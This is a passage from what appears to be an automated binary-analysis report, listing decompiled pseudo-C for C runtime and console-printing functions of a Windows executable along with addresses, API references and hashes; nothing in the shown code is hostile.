											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t433 - 0x14);
										if(__eflags == 0) {
											E00D82080(_t322, _t397, _t421, __eflags, _t457);
											E00D81250(0x1b, 0xc);
											_push(0xd9f918);
											E00D870FC(_t314, _t397, _t421, __eflags);
											_t435 = _t435 + 4;
											_t249 = E00D82E20(_t314, _t365, __eflags, _t457);
										}
										__eflags =  *(_t433 - 0x28);
										if( *(_t433 - 0x28) != 0) {
											L85:
											 *(_t433 - 0x28) = 0;
										} else {
											L42:
											 *(_t433 - 8) = 0;
											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
											while(1) {
												L44:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
													break;
												}
												L45:
												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t322 = 1 +  *(_t433 - 8);
												 *(_t433 - 8) = 1 +  *(_t433 - 8);
												_t391 =  *(_t433 - 0xc) - 1;
												__eflags = _t391;
												 *(_t433 - 0xc) = _t391;
											}
											L46:
											 *(_t433 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if(__eflags >= 0) {
													goto L50;
												}
												L49:
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												L47:
												_t322 = 1 +  *(_t433 - 8);
												__eflags = _t322;
												 *(_t433 - 8) = _t322;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t249;
						L88:
					}
				}
			}

































                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d83421
                                              0x00d8342a
                                              0x00d8342d
                                              0x00d8342d
                                              0x00d83430
                                              0x00d83433
                                              0x00d83433
                                              0x00d83439
                                              0x00d83442
                                              0x00d8344d
                                              0x00d8344e
                                              0x00d83453
                                              0x00d8346c
                                              0x00d83482
                                              0x00d83490
                                              0x00d83495
                                              0x00d8349a
                                              0x00d8349d
                                              0x00d834a0
                                              0x00d834a5
                                              0x00d834a5
                                              0x00d834ab
                                              0x00d834af
                                              0x00d834b0
                                              0x00d834b0
                                              0x00d834b5
                                              0x00d834be
                                              0x00d834cc
                                              0x00d834d0
                                              0x00d834da
                                              0x00d834de
                                              0x00d834e8
                                              0x00d834ec
                                              0x00d834f6
                                              0x00d834fa
                                              0x00d834fb
                                              0x00d83500
                                              0x00d83505
                                              0x00d8350e
                                              0x00d83511
                                              0x00d8351e
                                              0x00000000
                                              0x00d83513
                                              0x00d83513
                                              0x00d83519
                                              0x00d83519
                                              0x00d83523
                                              0x00d83523
                                              0x00d83527
                                              0x00d8352a
                                              0x00d83535
                                              0x00d83535
                                              0x00d8352c
                                              0x00d8352c
                                              0x00d83530
                                              0x00d83533
                                              0x00000000
                                              0x00000000
                                              0x00d83533
                                              0x00d8353c
                                              0x00d83540
                                              0x00d83543
                                              0x00d83545
                                              0x00d83548
                                              0x00d8354b
                                              0x00d8354d
                                              0x00d8354d
                                              0x00d8354b
                                              0x00d83554
                                              0x00d83558
                                              0x00d8355b
                                              0x00d83301
                                              0x00d83301
                                              0x00d83306
                                              0x00d8330a
                                              0x00d83328
                                              0x00d8332d
                                              0x00d83332
                                              0x00d83337
                                              0x00d8330c
                                              0x00d83310
                                              0x00d83315
                                              0x00d8331a
                                              0x00d8331f
                                              0x00d8331f
                                              0x00d8333a
                                              0x00d8333e
                                              0x00d83343
                                              0x00d83348
                                              0x00d8334d
                                              0x00d83354
                                              0x00d83359
                                              0x00d8336b
                                              0x00d8336b
                                              0x00d8336b
                                              0x00d8336f
                                              0x00000000
                                              0x00000000
                                              0x00d83371
                                              0x00d83371
                                              0x00d83376
                                              0x00d8337b
                                              0x00d83380
                                              0x00d83362
                                              0x00d83365
                                              0x00d83365
                                              0x00d83368
                                              0x00d83368
                                              0x00d83385
                                              0x00d83385
                                              0x00d83389
                                              0x00d8338b
                                              0x00d83391
                                              0x00d8339f
                                              0x00d8339f
                                              0x00d8339f
                                              0x00d833a3
                                              0x00000000
                                              0x00000000
                                              0x00d833a5
                                              0x00d833ab
                                              0x00d833c2
                                              0x00d833c2
                                              0x00d833c2
                                              0x00d833c4
                                              0x00d83396
                                              0x00d83399
                                              0x00d83399
                                              0x00d8339c
                                              0x00d8339c
                                              0x00d833c7
                                              0x00d833c7
                                              0x00d833d9
                                              0x00d833d9
                                              0x00d833dc
                                              0x00d833df
                                              0x00000000
                                              0x00000000
                                              0x00d833e1
                                              0x00d833e7
                                              0x00d833f8
                                              0x00d833f8
                                              0x00d833f8
                                              0x00d833fa
                                              0x00d833d0
                                              0x00d833d3
                                              0x00d833d3
                                              0x00d833d6
                                              0x00d833d6
                                              0x00d833d9
                                              0x00d833fd
                                              0x00d83400
                                              0x00d83403
                                              0x00d83405
                                              0x00d83405
                                              0x00d8340c
                                              0x00d8340f
                                              0x00d83412
                                              0x00d8342d
                                              0x00d83430
                                              0x00d83433
                                              0x00d83433
                                              0x00000000
                                              0x00d83433
                                              0x00d83561
                                              0x00d83561
                                              0x00d83565
                                              0x00d83568
                                              0x00000000
                                              0x00000000
                                              0x00d8356e
                                              0x00d8356e
                                              0x00d83572
                                              0x00d83575
                                              0x00000000
                                              0x00000000
                                              0x00d8357b
                                              0x00d83584
                                              0x00d83584
                                              0x00d83589
                                              0x00d8358b
                                              0x00000000
                                              0x00000000
                                              0x00d82e89
                                              0x00d82e89
                                              0x00d82e90
                                              0x00d82e97
                                              0x00d82e9e
                                              0x00d82eaf
                                              0x00d82eb4
                                              0x00d82eb7
                                              0x00d82ebc
                                              0x00d82ebc
                                              0x00d82ec9
                                              0x00d82ed7
                                              0x00d82ee5
                                              0x00d82ef5
                                              0x00d82efc
                                              0x00d82f01
                                              0x00d82f07
                                              0x00000000
                                              0x00000000
                                              0x00d82f09
                                              0x00d82f13
                                              0x00d82f18
                                              0x00d82f1b
                                              0x00d82f20
                                              0x00d82f20
                                              0x00d82f23
                                              0x00d82f27
                                              0x00d82f31
                                              0x00d82f38
                                              0x00d82f3d
                                              0x00d82f43
                                              0x00000000
                                              0x00000000
                                              0x00d82f45
                                              0x00d82f53
                                              0x00d82f58
                                              0x00d82f5d
                                              0x00d82f65
                                              0x00d82f65
                                              0x00d82f68
                                              0x00d82f6a
                                              0x00d82f6a
                                              0x00d82f6f
                                              0x00d82f70
                                              0x00d82f75
                                              0x00d82f75
                                              0x00d82f7d
                                              0x00d82f80
                                              0x00d82f83
                                              0x00d82f89
                                              0x00d82f8a
                                              0x00d82f92
                                              0x00d82f9b
                                              0x00d82fa0
                                              0x00d82fa5
                                              0x00d82fb1
                                              0x00d82fb6
                                              0x00d82fbb
                                              0x00d82fc7
                                              0x00d82fcc
                                              0x00d82fd1
                                              0x00d82fdd
                                              0x00d82fe2
                                              0x00d82fe7
                                              0x00d82fec
                                              0x00d82ff3
                                              0x00d82ff8
                                              0x00d8300a
                                              0x00d8300a
                                              0x00d8300a
                                              0x00d8300e
                                              0x00000000
                                              0x00000000
                                              0x00d83010
                                              0x00d83010
                                              0x00d83015
                                              0x00d8301a
                                              0x00d83004
                                              0x00d83004
                                              0x00d83007
                                              0x00d83007
                                              0x00d8301f
                                              0x00d83023
                                              0x00d83028
                                              0x00d8302d
                                              0x00d83032
                                              0x00d83035
                                              0x00d8303c
                                              0x00d8303f
                                              0x00d83042
                                              0x00d8304b
                                              0x00d83054
                                              0x00d83057
                                              0x00d8305b
                                              0x00d8321b
                                              0x00d8321b
                                              0x00d83224
                                              0x00d83229
                                              0x00d8322e
                                              0x00d8323a
                                              0x00d8323f
                                              0x00d83244
                                              0x00d83249
                                              0x00d8324c
                                              0x00000000
                                              0x00d83061
                                              0x00d83061
                                              0x00d83064
                                              0x00000000
                                              0x00d8306b
                                              0x00d8306f
                                              0x00d83074
                                              0x00d83079
                                              0x00d83081
                                              0x00d8308a
                                              0x00d8308f
                                              0x00d83092
                                              0x00d830a4
                                              0x00d830a4
                                              0x00d830a7
                                              0x00d830aa
                                              0x00000000
                                              0x00000000
                                              0x00d830ac
                                              0x00d830b9
                                              0x00d830be
                                              0x00d830c3
                                              0x00d830c6
                                              0x00d830c8
                                              0x00d830d0
                                              0x00d830e1
                                              0x00d830e1
                                              0x00d830e1
                                              0x00d830e3
                                              0x00d830e7
                                              0x00d830e7
                                              0x00d830ea
                                              0x00d830ea
                                              0x00d8309e
                                              0x00d8309e
                                              0x00d830a1
                                              0x00d830a1
                                              0x00d830ef
                                              0x00d830ef
                                              0x00d830f2
                                              0x00000000
                                              0x00000000
                                              0x00d830fa
                                              0x00d830fa
                                              0x00d830fe
                                              0x00d83103
                                              0x00d83108
                                              0x00d8310d
                                              0x00d83110
                                              0x00d83121
                                              0x00d8312a
                                              0x00d8312c
                                              0x00d83136
                                              0x00d8313b
                                              0x00d83140
                                              0x00d83145
                                              0x00d83145
                                              0x00d83148
                                              0x00d83151
                                              0x00d83151
                                              0x00d83155
                                              0x00d83158
                                              0x00d83159
                                              0x00d8315e
                                              0x00d83165
                                              0x00d83177
                                              0x00d83177
                                              0x00d83177
                                              0x00d8317a
                                              0x00d8317d
                                              0x00000000
                                              0x00000000
                                              0x00d8317f
                                              0x00d8317f
                                              0x00d83186
                                              0x00d83189
                                              0x00d8318c
                                              0x00d83191
                                              0x00d83199
                                              0x00d8319b
                                              0x00d831a0
                                              0x00d831a3
                                              0x00d831a9
                                              0x00d831ac
                                              0x00d831af
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b6
                                              0x00d831b7
                                              0x00d831ba
                                              0x00d831ba
                                              0x00d831bd
                                              0x00d831bd
                                              0x00d8316e
                                              0x00d83171
                                              0x00d83171
                                              0x00d83174
                                              0x00d83174
                                              0x00d831c2
                                              0x00d831c2
                                              0x00d831c5
                                              0x00000000
                                              0x00000000
                                              0x00d831cd
                                              0x00d831cd
                                              0x00d831df
                                              0x00d831df
                                              0x00d831df
                                              0x00d831e2
                                              0x00d831e5
                                              0x00000000
                                              0x00000000
                                              0x00d831e7
                                              0x00d831ea
                                              0x00d831ed
                                              0x00d831f3
                                              0x00d831f6
                                              0x00d831f9
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d83200
                                              0x00d83201
                                              0x00d83204
                                              0x00d83207
                                              0x00d831d6
                                              0x00d831d9
                                              0x00d831d9
                                              0x00d831dc
                                              0x00d831dc
                                              0x00d8320c
                                              0x00d8320c
                                              0x00d8320f
                                              0x00d83253
                                              0x00d83253
                                              0x00d83257
                                              0x00d83259
                                              0x00d83262
                                              0x00d83267
                                              0x00d8326c
                                              0x00d83271
                                              0x00d83274
                                              0x00d83274
                                              0x00d83279
                                              0x00d8327d
                                              0x00d8357d
                                              0x00d8357d
                                              0x00d83283
                                              0x00d83283
                                              0x00d83283
                                              0x00d83290
                                              0x00d832a7
                                              0x00d832a7
                                              0x00d832aa
                                              0x00d832ad
                                              0x00000000
                                              0x00000000
                                              0x00d832af
                                              0x00d832b5
                                              0x00d832c6
                                              0x00d832c6
                                              0x00d832c6
                                              0x00d832c8
                                              0x00d83298
                                              0x00d8329b
                                              0x00d832a1
                                              0x00d832a1
                                              0x00d832a4
                                              0x00d832a4
                                              0x00d832cb
                                              0x00d832cb
                                              0x00d832dd
                                              0x00d832dd
                                              0x00d832e0
                                              0x00d832e3
                                              0x00000000
                                              0x00000000
                                              0x00d832e5
                                              0x00d832eb
                                              0x00d832fc
                                              0x00d832fc
                                              0x00d832fc
                                              0x00d832fe
                                              0x00d832d4
                                              0x00d832d7
                                              0x00d832d7
                                              0x00d832da
                                              0x00d832da
                                              0x00000000
                                              0x00d832dd
                                              0x00000000
                                              0x00000000
                                              0x00d83214
                                              0x00000000
                                              0x00000000
                                              0x00d83064
                                              0x00000000
                                              0x00d8305b
                                              0x00d83591
                                              0x00d83596
                                              0x00000000
                                              0x00d83596
                                              0x00d8342d

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D83453
                                              • _wprintf.LIBCMT ref: 00D83500
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition
                                              • String ID: %d.$%s%s%s%s
                                              • API String ID: 3459578117-4028964860
                                              • Opcode ID: 7fa3c1019b1153e5c8653d0b8562e84d6e45fc3c2bb956a354ea50f2f1e45f52
                                              • Instruction ID: 1c782eac3633d62c8cd7f9f2cec714bd71402168c06191b0f68d1d6aff4a75cb
                                              • Opcode Fuzzy Hash: 7fa3c1019b1153e5c8653d0b8562e84d6e45fc3c2bb956a354ea50f2f1e45f52
                                              • Instruction Fuzzy Hash: 93419071E0404AAFCF18DB84D4D1BBEBB76EF91708F598199D015AB245DB30EA45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D91613, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E00D91613(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				void* __edi;
				signed int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				void* _t57;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					_push(_t57);
					E00D877F7( &_v20, _t57, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00D911EB( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x20432f41
							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00D88E9F(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x3a202020
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x3a202020
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x3a202020
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x3a202020
						_t18 = _t59 + 4; // 0x20432f41
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                              0x00d9161b
                                              0x00d91620
                                              0x00d9163a
                                              0x00000000
                                              0x00d9163a
                                              0x00d91622
                                              0x00d91627
                                              0x00000000
                                              0x00000000
                                              0x00d9162c
                                              0x00d91640
                                              0x00d91647
                                              0x00d9164c
                                              0x00d9164f
                                              0x00d91656
                                              0x00d91675
                                              0x00d9167c
                                              0x00d9167e
                                              0x00d916c2
                                              0x00d916ca
                                              0x00d916d6
                                              0x00d916df
                                              0x00d916e1
                                              0x00d916f1
                                              0x00d916f1
                                              0x00d916f5
                                              0x00d916f7
                                              0x00d916fa
                                              0x00d916fa
                                              0x00d916fa
                                              0x00d916fa
                                              0x00000000
                                              0x00d91700
                                              0x00d916e3
                                              0x00d916e3
                                              0x00d916e8
                                              0x00d916e8
                                              0x00d916eb
                                              0x00000000
                                              0x00d916eb
                                              0x00d91680
                                              0x00d91683
                                              0x00d91687
                                              0x00d916b0
                                              0x00d916b0
                                              0x00d916b0
                                              0x00d916b3
                                              0x00d916b3
                                              0x00000000
                                              0x00000000
                                              0x00d916b5
                                              0x00d916b9
                                              0x00000000
                                              0x00000000
                                              0x00d916bb
                                              0x00d916bb
                                              0x00d916bb
                                              0x00000000
                                              0x00d916bb
                                              0x00d91689
                                              0x00d91689
                                              0x00d9168c
                                              0x00000000
                                              0x00000000
                                              0x00d91690
                                              0x00d9169a
                                              0x00d916a0
                                              0x00d916a3
                                              0x00d916a9
                                              0x00d916ac
                                              0x00d916ae
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d916ae
                                              0x00d91658
                                              0x00d9165b
                                              0x00d9165d
                                              0x00d91662
                                              0x00d91662
                                              0x00d91667
                                              0x00000000
                                              0x00d91667
                                              0x00d9162e
                                              0x00d91633
                                              0x00d91637
                                              0x00d91637
                                              0x00000000

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D91647
                                              • __isleadbyte_l.LIBCMT ref: 00D91675
                                              • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,00D9FF04,?,00000000), ref: 00D916A3
                                              • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,00D9FF04,?,00000000), ref: 00D916D9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: bf482f613f0bd6081750e2a0ab724744056e6d1e502a9c5c950e15b6278d640f
                                              • Instruction ID: 309b3c788733fc043ea21259d649f2962deb708f3b7b23bcddbebfe6a65dd27c
                                              • Opcode Fuzzy Hash: bf482f613f0bd6081750e2a0ab724744056e6d1e502a9c5c950e15b6278d640f
                                              • Instruction Fuzzy Hash: 9231AB39A04247AFDF229E65CC45BAA7BB5FF41350F1D4129F461871A0E731E8A1EBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8EC51, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D8EC51(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00D8F19E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00D8ECD7(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00D8F413(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00D8F354(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                              0x00d8ec54
                                              0x00d8ec5a
                                              0x00d8eccd
                                              0x00000000
                                              0x00d8ec61
                                              0x00d8ec61
                                              0x00d8ec64
                                              0x00d8ec7f
                                              0x00d8ec82
                                              0x00d8eca2
                                              0x00d8ecb4
                                              0x00d8ec84
                                              0x00d8ec84
                                              0x00d8ec87
                                              0x00000000
                                              0x00d8ec89
                                              0x00d8ec9b
                                              0x00d8ec9b
                                              0x00d8ec87
                                              0x00d8ecd2
                                              0x00d8ecd6
                                              0x00d8ec66
                                              0x00d8ec7e
                                              0x00d8ec7e
                                              0x00d8ec64

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                              • Instruction ID: c8ac75023565e6f3c15ac3b5b9c07b3fd2e98181e3e402ac079495d98a937f4b
                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                              • Instruction Fuzzy Hash: 1201487280014ABBCF266F89CC41CEE3F22BB18354B598425FE5858031D737C9B1AFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8CBB0, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00D8CBB0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xd9d9a0);
				E00D89100(__ebx, __edi, __esi);
				_t31 = E00D8D53F(__edx, __edi, _t35);
				_t25 =  *0xda1c6c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00D8BDFF(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xda1524; // 0xda1820
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xda1820;
								if(__eflags != 0) {
									E00D88EF3(_t33);
								}
							}
						}
						_t20 =  *0xda1524; // 0xda1820
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xda1524; // 0xda1820
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00D8CC4C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00D874BF(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00D89145(_t33);
			}









                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb2
                                              0x00d8cbb7
                                              0x00d8cbc1
                                              0x00d8cbc3
                                              0x00d8cbcc
                                              0x00d8cbed
                                              0x00d8cbf3
                                              0x00d8cbf7
                                              0x00d8cbfa
                                              0x00d8cbfd
                                              0x00d8cc03
                                              0x00d8cc05
                                              0x00d8cc07
                                              0x00d8cc10
                                              0x00d8cc12
                                              0x00d8cc14
                                              0x00d8cc1a
                                              0x00d8cc1d
                                              0x00d8cc22
                                              0x00d8cc1a
                                              0x00d8cc12
                                              0x00d8cc23
                                              0x00d8cc28
                                              0x00d8cc2b
                                              0x00d8cc31
                                              0x00d8cc35
                                              0x00d8cc35
                                              0x00d8cc3b
                                              0x00d8cc42
                                              0x00d8cbd4
                                              0x00d8cbd4
                                              0x00d8cbd4
                                              0x00d8cbd7
                                              0x00d8cbd9
                                              0x00d8cbdd
                                              0x00d8cbe2
                                              0x00d8cbea

                                              APIs
                                                • Part of subcall function 00D8D53F: __getptd_noexit.LIBCMT ref: 00D8D540
                                              • __lock.LIBCMT ref: 00D8CBED
                                              • InterlockedDecrement.KERNEL32(?), ref: 00D8CC0A
                                              • _free.LIBCMT ref: 00D8CC1D
                                              • InterlockedIncrement.KERNEL32(00DA1820), ref: 00D8CC35
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 2704283638-0
                                              • Opcode ID: d391ef3f988492e9950db01311ed95c94ed73f9a1835a8a7e53d33566e5a884f
                                              • Instruction ID: 78f02228e0e80f0d5dca683f31304c63460492437af7ff0a7b1c455f2df9bf67
                                              • Opcode Fuzzy Hash: d391ef3f988492e9950db01311ed95c94ed73f9a1835a8a7e53d33566e5a884f
                                              • Instruction Fuzzy Hash: 4D019236D05B11EBC711BB65984A79DB7A4FF05B10F1D500AE819A7390CB346941CFF6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D81AD0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 259COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00D81AD0(intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				intOrPtr _v68;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v92;
				char _v167;
				char _v168;
				signed int _t163;
				signed int _t177;
				signed int _t178;
				void* _t186;
				intOrPtr _t189;
				void* _t292;
				void* _t293;
				void* _t294;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v168 = 0;
				_t163 = E00D88740( &_v167, 0, 0x31);
				_t294 = _t293 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t163;
				asm("cdq");
				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v36 =  *(_t292 + 0xffffffffffffffa4);
				asm("cdq");
				_v20 = _v36 / 0x64;
				asm("cdq");
				_v12 = _v36 % 0x64;
				asm("cdq");
				_v40 = _v12 / 0xa;
				_t177 = _v12;
				asm("cdq");
				_t178 = _t177 / 0xa;
				_v44 = _t177 % 0xa;
				if(_v12 >= 0x14 || _v20 == 0) {
					if(_v12 >= 0x14 || _v20 != 0) {
						if(_v12 <= 0x14 || _v20 == 0) {
							E00D81DF0(_t178, _v40,  &_v92);
							E00D81DE0( &_v32, _v44,  &_v32);
							E00D880E0( &_v64,  &_v32);
							_t294 = _t294 + 8;
						} else {
							E00D81DE0(_v20, _v20,  &_v32);
